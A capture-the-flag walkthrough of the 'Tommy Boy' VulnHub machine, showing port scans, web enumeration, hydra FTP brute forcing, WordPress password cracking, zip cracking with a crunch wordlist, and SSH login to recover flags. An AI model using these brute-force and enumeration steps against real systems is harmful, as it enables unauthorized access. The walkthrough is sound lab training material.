The Callahan Auto company has finally entered the world of modern technology and stood up a Web server for their customers to use for ordering brake pads.
Unfortunately, the site just went down and the only person with admin credentials is Tom Callahan Sr. - who just passed away! And to make matters worse, the only other guy with knowledge of the server just quit!
You’ll need to help Tom Jr., Richard and Michelle get the Web page restored again. Otherwise Callahan Auto will most certainly go out of business :-(“ – Brian Johnson
More information and OVA file download please check here.
Attacker & Target
Attacker: Kali2 Linux (10.1.1.132/24)
Target: PwnLab: init (10.1.1.141/24)
All the tools used here can be found in Kali Linux
Using arp-scan as routine to detect the target’s IP address.
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)10.1.1.1 00:50:56:c0:00:08 VMware, Inc.
10.1.1.2 00:50:56:f1:61:7e VMware, Inc.
10.1.1.141 00:0c:29:8f:0f:b7 VMware, Inc.
10.1.1.254 00:50:56:f1:c0:1f VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.363 seconds (108.34 hosts/sec). 4 responded
10.1.1.141 is our Target!
Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).
root@kali:~/myExercises/tommyboy1# masscan -p1-65535 10.1.1.141/32 --rate=10000
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-09-04 11:29:55 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]Discovered open port 8008/tcp on 10.1.1.141
Discovered open port 22/tcp on 10.1.1.141
Discovered open port 80/tcp on 10.1.1.141
Discovered open port 65534/tcp on 10.1.1.141
Nmap scan report for 10.1.1.141
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:
|2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)|_ 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 4 disallowed entries
| /6packsofb...soda /lukeiamyourfather
|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Welcome to Callahan Auto
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: KEEP OUT
65534/tcp open ftp ProFTPD
MAC Address: 00:0C:29:8F:0F:B7 (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
Based on the result of NMAP scan, firstly, I found OpenSSH 7.2p2 running on port 22, Apache httpd 2.4.18 running on port 80 and 8008 and ProFTPd running on port 65534.
In the meanwhile, I run nikto to scan web vulnerabilities.
Nothing found on port 8008, however, there are some interesting findings from nikto scan on port 80:
+ Entry '/6packsofb...soda' in robots.txt returned a non-forbidden or redirect HTTP code (301)+ OSVDB-3268: /lukeiamyourfather/: Directory indexing found.
+ Entry '/lukeiamyourfather/' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry '/lookalivelowbridge/' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ Entry '/flag-numero-uno.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ "robots.txt" contains 4 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
I noticed that the robot file robots.txt is found and including 4 entries:
Also checked other folders but nothing found, so I decited to move on.
Then, by checking the source code of index page on port 80, hidden comments are found:
<html><title>Welcome to Callahan Auto</title><body><H1><center>Welcome to Callahan Auto!</center></H1><fontcolor="FF3339"><H2>SYSTEM ERROR!</H2></font>If your'e reading this, the Callahan Auto customer ordering system is down. Please restore the backup copy immediately.
<p>See Nick in IT for assistance.
</html><!--Comment from Nick: backup copy is in Big Tom's home folder--><!--Comment from Richard: can you give me access too? Big Tom's the only one w/password--><!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time--><!--Comment from Richard: please, I'll ask nicely--><!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog--><!--Comment from Richard: Deal. Where's the blog again?--><!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--><!--Comment from Richard: Ah! How could I forget? Thanks-->
From the comment, I got a YouTube hint: https://www.youtube.com/watch?v=VUxOd4CszJ8, after checked the youtube, I got the hidden blog path is http://10.1.1.141/prehistoricforest.
From the YouTube video, I got the key to access to the hidden blog (Hint:if met Database Error, restart the target VM should fix the problem) and found the 2nd flag clue under the post Announcing the Callahan internal company blog!, the URL is http://10.1.1.141/prehistoricforest/index.php/2016/07/06/announcing-the-callahan-internal-company-blog/
The 2nd Flag
The 2nd Flag is Z4l1nsky
Another hint from the post SON OF A!:
There is another Image File under the folder http://10.1.1.141/richard/shockedrichard.jpg
By checking the imga file with tool exif, I noticed that there is a MD5 hash in User Comment:
By cracking the hash online and got the cracked password is spanky>
In the other post Protected: Status of restoring company home page, I found a password is needed.
Then I input spanky as the password and got into the protected blog.
Some important information from the blog:
In order to restore, there is a backup file called callahanbak.bak that we can rename it to index.html. (We have to do this under Big Tom’s account via SSH)
Big Tom’s account name should be able to find in the user list and may not be called as bigtom but easy to recognize.
There is a FTP service running on non-standard port (65543, which is found by NMAP in the previous step) and can be accessed by nick’s account.
Nick’s account name is nickburns and the password is very easy to guess.
Nick is not able to access SSH but only FTP.
Based on the information above, I use hydra to do a quick brute force scanning:
root@kali:~/myExercises/tommyboy1# hydra -e nsr -l nickburns ftp://10.1.1.141:65534/
Hydra v8.2 (c)2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-04 22:36:19
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 65534
[ftp] host: 10.1.1.141 login: nickburns password: nickburns
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-09-04 22:36:20
and found Nick’s FTP login credencial is nickburns / nickburns
Now I login to FTP as Nick and downloaded the only file readme.txt
root@kali:~/myExercises/tommyboy1# ftp 10.1.1.141 65534
Connected to 10.1.1.141.
220 Callahan_FTP_Server 1.3.5
Name (10.1.1.141:root): nickburns
331 Password required for nickburns
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
?Invalid commandftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 nickburns nickburns 977 Jul 15 02:37 readme.txt
226 Transfer completeftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful
150 Opening BINARY mode data connection for readme.txt (977 bytes)226 Transfer complete977 bytes received in 0.02 secs (40.6745 kB/s)ftp> bye
Due to this is WordPress application, I use wpscan to check if any vulnerability exists and enumerate users:
[+] Identified the following 4 user/s:
| Id | Login | Name | +----+----------+-------------------+
|1| richard | richard ||2| tom | Big Tom ||3| tommy | Tom Jr. ||4| michelle | Michelle Michelle | +----+----------+-------------------+
Four WP users found:
Then use dictionary file rockyou.txt to brute force crack those users, and got tom’s password cracked:
| Id | Login | Name | Password | +----+----------+-------------------+----------+
|1| richard | richard |||2| tom | Big Tom | tomtom1 ||3| tommy | Tom Jr. |||4| michelle | Michelle Michelle || +----+----------+-------------------+----------+
After change User-Agent toIphone 3, I got the different content!
Use wfuzz with rockyou.txt to find out the hidden html file:
root@kali:~# wfuzz -c -v -w /usr/share/wordlists/rockyou.txt -H "User-Agent:Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" --hc 404 http://10.1.1.141:8008/NickIzL33t/FUZZ.html
* Wfuzz 2.1.3 - The Web Bruteforcer *
Total requests: 14344392==============================================================================================================================================ID C.Time Response Lines Word Chars Server Redirect Request==============================================================================================================================================97206: 0.040s C=20012 L 65 W 459 Ch Apache/2.4.18 (Ub "fallon1"...truncated...
The 3rd Flag
The 2nd Flag is TinyHead
Here is also an encrypted backup zip file t0msp4ssw0rdz.zip and also a hint file which including the clues about password:
root@kali:~/myExercises/tommyboy1# crunch 1313 -t bev,%%@@^1995 -o pass_dict.lst
Crunch will now generate the following amount of data: 812011200 bytes
Crunch will now generate the following number of lines: 58000800crunch: 27% completed generating output
crunch: 53% completed generating output
crunch: 83% completed generating output
crunch: 100% completed generating output
Then use fcrackzip with the generated dictionary file to crack the encrypted store zip file:
The password is bevH00tr$1995 and the unzipped file is password.txt
root@kali:~/myExercises/tommyboy1# cat passwords.txt
Sandusky Banking Site
TheKnot.com (wedding site)---------------------------
Callahan Auto Server
Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.
Callahan Company Blog
Username: bigtom(I think?)Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
After login to the blog as Big Tom by using the password found previously in wpscan stage, I noticed that there is a draft post:
Now I got the Server SSH login password:
Callahan Auto Server
root@kali:~/myExercises/tommyboy1# ssh firstname.lastname@example.org
The authenticity of host '10.1.1.141 (10.1.1.141)' can't be established.ECDSA key fingerprint is SHA256:bI4/w4tR6j1XRyuLkIs5icsyLJM0Kfw9m4iPFpXX0NI.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '10.1.1.141' (ECDSA) to the list of known email@example.com's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-36-generic x86_64) * Documentation: https://help.ubuntu.com/
112 packages can be updated.
0 updates are security updates.
Last login: Thu Jul 14 13:45:57 2016
uid=1002(bigtommysenior)gid=1002(bigtommysenior)groups=1002(bigtommysenior)bigtommysenior@CallahanAutoSrv01:~$ uname -a
Linux CallahanAutoSrv01 4.4.0-36-generic #55-Ubuntu SMP Thu Aug 11 18:01:55 UTC 2016 x86_64 x86_64 x86_64 GNU/Linuxbigtommysenior@CallahanAutoSrv01:~$ pwd/home/bigtommysenior
bigtommysenior@CallahanAutoSrv01:~$ ls -la
drwxr-x--- 4 bigtommysenior bigtommysenior 4096 Jul 8 08:57 .
drwxr-xr-x 5 root root 4096 Jul 7 00:17 ..
-rw------- 1 bigtommysenior bigtommysenior 0 Jul 21 17:47 .bash_history
-rw-r--r-- 1 bigtommysenior bigtommysenior 220 Jul 7 00:12 .bash_logout
-rw-r--r-- 1 bigtommysenior bigtommysenior 3771 Jul 7 00:12 .bashrc
drwx------ 2 bigtommysenior bigtommysenior 4096 Jul 7 00:16 .cache
-rw-r--r-- 1 bigtommysenior bigtommysenior 307 Jul 7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior 237 Jul 7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior 630 Jul 7 17:59 LOOT.ZIP
drwxrwxr-x 2 bigtommysenior bigtommysenior 4096 Jul 7 13:50 .nano
-rw-r--r-- 1 bigtommysenior bigtommysenior 675 Jul 7 00:12 .profile
-rw-r--r-- 1 bigtommysenior bigtommysenior 0 Jul 7 00:17 .sudo_as_admin_successful
The 4th Flag
bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
Flag data: EditButton
But...but...where's flag 5? I'll make it easy on you. It's in the root of this server at /5.txt
Then doing the restoring the web site from backup, I got he server back online again:
bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html
bigtommysenior@CallahanAutoSrv01:~$ ls -l /var/www/html/index.html
-rw-r--r-- 1 bigtommysenior bigtommysenior 307 Sep 5 07:16 /var/www/html/index.html
bigtommysenior@CallahanAutoSrv01:~$ cat /var/www/html/index.html
<title>Welcome to Callahan Auto</title>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="0000ff"><H2><center>SYSTEM STATUS: ONLINE</center></H2></font>
<H3>We're happy to be serving all your brakepad needs.</H3>
By doing enumeration and found the following world-writable folders:
bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP
[LOOT.ZIP] THE-END.txt password:
callahanbak.bak el-flag-numero-quatro.txt LOOT.ZIP THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt
Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.
I'd love to know that you finished this VM, and/or get your suggestions on how to make the next one better.Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"Or, get in touch with me other ways:* Twitter: @7MinSec* IRC (Freenode): #vulnhub (username is braimee)Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
Thanks and have a blessed week!
7 Minute Security